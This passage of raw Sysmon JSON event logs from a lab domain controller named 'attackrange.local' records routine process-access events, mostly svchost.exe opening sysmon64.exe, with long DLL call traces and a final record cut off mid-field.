C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010A9850500}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 